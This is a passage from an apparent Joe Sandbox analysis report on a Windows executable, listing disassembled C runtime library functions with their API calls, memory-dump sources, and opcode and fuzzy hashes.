                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                          • Opcode ID: a0d42a46c90769f60d36906e86f9fd6c281415a92f21ae6c0ea5a87b07f249c2
                                                                                                                                                                                                                          • Instruction ID: 27244e559bb04bbedfa133f34038876b290b5ba23cef00845cddfe1da2ee4c3d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0d42a46c90769f60d36906e86f9fd6c281415a92f21ae6c0ea5a87b07f249c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21B09228F17E03C6EE18BB716C42214A2B97F48700FC96438C50C81320EF2C20B69B20
                                                                                                                                                                                                                          Function 00007FF79CD660B8 Relevance: .1, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                          • Opcode ID: c888220ac25f2a157fe108ee8bd57d2237805738db1b9471354312c3ca38c74f
                                                                                                                                                                                                                          • Instruction ID: 66be139d00e4aee49b720a080c3cae037c98ddba4bb1f3288d282c3ceffd9f10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c888220ac25f2a157fe108ee8bd57d2237805738db1b9471354312c3ca38c74f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5541AF62714E5682EF14DF7ADA151A9B3B1BB49FD0B89A037DE0D97B58DE3DD0428300
                                                                                                                                                                                                                          Function 00007FF79CD6CF90 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5db59fcd91de8ce441c2069447a0ba13dca0c4a9882f05b600e0947c0899d767
                                                                                                                                                                                                                          • Instruction ID: 09101a74c97cd6e591309cfbb73ac8df5a124e50fdcd494df69f93791cdaa04c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5db59fcd91de8ce441c2069447a0ba13dca0c4a9882f05b600e0947c0899d767
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F068727186968EEFA49F7DA442639B7E5E7483C0F949039D58D83B04D63C90608F14
                                                                                                                                                                                                                          Function 00007FF79CD62168 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fb8d191dd7ab2ab59f919ad0be67383a0551562d40b8726f21588f9b11ad625f
                                                                                                                                                                                                                          • Instruction ID: 1b1c6724fe3896353e48004d866c94411c824348d48ff32d5f28fa261092402c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb8d191dd7ab2ab59f919ad0be67383a0551562d40b8726f21588f9b11ad625f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6A00121A0DC0391EE24AB20AA50270B230ABA5340BC12432C15D814619E3CA440D220
                                                                                                                                                                                                                          Function 00007FF79CD637E8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                          • Opcode ID: df7485643d1e2d311ad76c081518edd367621b4788205a7bdedfaa9492c96a11
                                                                                                                                                                                                                          • Instruction ID: 733ebe15bcfffc0b3cbe957e39117b4d18c92874e73e6474926b32d7021f99d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df7485643d1e2d311ad76c081518edd367621b4788205a7bdedfaa9492c96a11
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7D15C22A08E8686EF30AB75D5413ADB7B0FF49788F902135EA8D57B96CF38E055C710
                                                                                                                                                                                                                          Function 00007FF79CD64A4C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64AD1
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64ADF
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64B09
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64B77
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64B83
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                          • Opcode ID: 98d9174312598c4a04092f17d89ad65b0ae9d13167452c4ab0cd5aff0e5c734b
                                                                                                                                                                                                                          • Instruction ID: f5479ab72ec8d0ff7efc1d44eae811fc32fae7e88bf518cab9dcdca10d7b7856
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98d9174312598c4a04092f17d89ad65b0ae9d13167452c4ab0cd5aff0e5c734b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02316E21B1AE4391EF31EB36E600675B2A4BF48BA4F896535ED1D47794EE3CE445C320
                                                                                                                                                                                                                          Function 00007FF79CD66B84 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                          • Opcode ID: b88695dae9efd57bf988d7feafabc4692ebde99282553b2e04a6e7434c849825
                                                                                                                                                                                                                          • Instruction ID: 793dd06227bf86fea691de7b0644637dca9a2374aefa1d0c92276cf74cc53fd0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b88695dae9efd57bf988d7feafabc4692ebde99282553b2e04a6e7434c849825
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67213A20B0CE4781FE74BB356755179F272AF447A4F847635E92E06BC6DE3CA402C220
                                                                                                                                                                                                                          Function 00007FF79CD6CA54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                          • Opcode ID: f9eaa7f7d60b527212cfcf40deb3c737339707099e914ac58b9d60e49017044c
                                                                                                                                                                                                                          • Instruction ID: 909cb6762caeb634865193f8c206c04eca83906d50dd1e90c6dfce296481f64f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9eaa7f7d60b527212cfcf40deb3c737339707099e914ac58b9d60e49017044c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02119632718F4282EB60AB62F984325B2B4FB88BE4F805234E95E47794CF7CD544C750
                                                                                                                                                                                                                          Function 00007FF79CD66CFC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D0B
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D41
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D6E
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D7F
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D90
                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66DAB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                          • Opcode ID: cef237a7154ba8bbe1c7310cb62ac7f2d9cb81adb37255596516d0a16f09c46e
                                                                                                                                                                                                                          • Instruction ID: 82d356c5b983fd0e0de3d2deab7843f19790844b2c3a29aff0a031cc2c9264fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cef237a7154ba8bbe1c7310cb62ac7f2d9cb81adb37255596516d0a16f09c46e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9113B21B1CE4342FE74B731A766179F272AF457A0F846735E92E067D6DE3CA402C620
                                                                                                                                                                                                                          Function 00007FF79CD65D34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                          • Opcode ID: ba4b32788355262f80aa9f09833ab5d54779705550cbd92be88f139d7f9e84ba
                                                                                                                                                                                                                          • Instruction ID: 1f9d5e787d7156a1a52f5db1cc07f5fe04291c7a0462251e454e2994207e1e55
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba4b32788355262f80aa9f09833ab5d54779705550cbd92be88f139d7f9e84ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25F03C65B09E0382EE24AB74E459379A330AF497A5F942635C56E462E4DF2CD085C720
                                                                                                                                                                                                                          Function 00007FF79CD6CDA4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                          • Instruction ID: 1f940015cb9fd703c4d1a5a6da72bb9f2f20615c6826cb5c342a22e03c77e94f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF119D76F48E1301FF743138E641379B0706F99364EA52A30EA6E066D7DF2EE941C660
                                                                                                                                                                                                                          Function 00007FF79CD66DC4 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66DE3
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66E02
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66E2A
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66E3B
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66E4C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                          • Opcode ID: 363560c9d3aeb12ce5f8eaf5039eab8462c4c74fce632259e44cdf386c032e5d
                                                                                                                                                                                                                          • Instruction ID: b7ff6e0d3b2564fad5f8c37107d84fbd7349e9fed28ac574298000a85f875376
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 363560c9d3aeb12ce5f8eaf5039eab8462c4c74fce632259e44cdf386c032e5d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84112C21B08E4341FE78B735A762179F2726F447A0F84A335E92D467D6DE3CE402C620
                                                                                                                                                                                                                          Function 00007FF79CD66C58 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3702945584-0
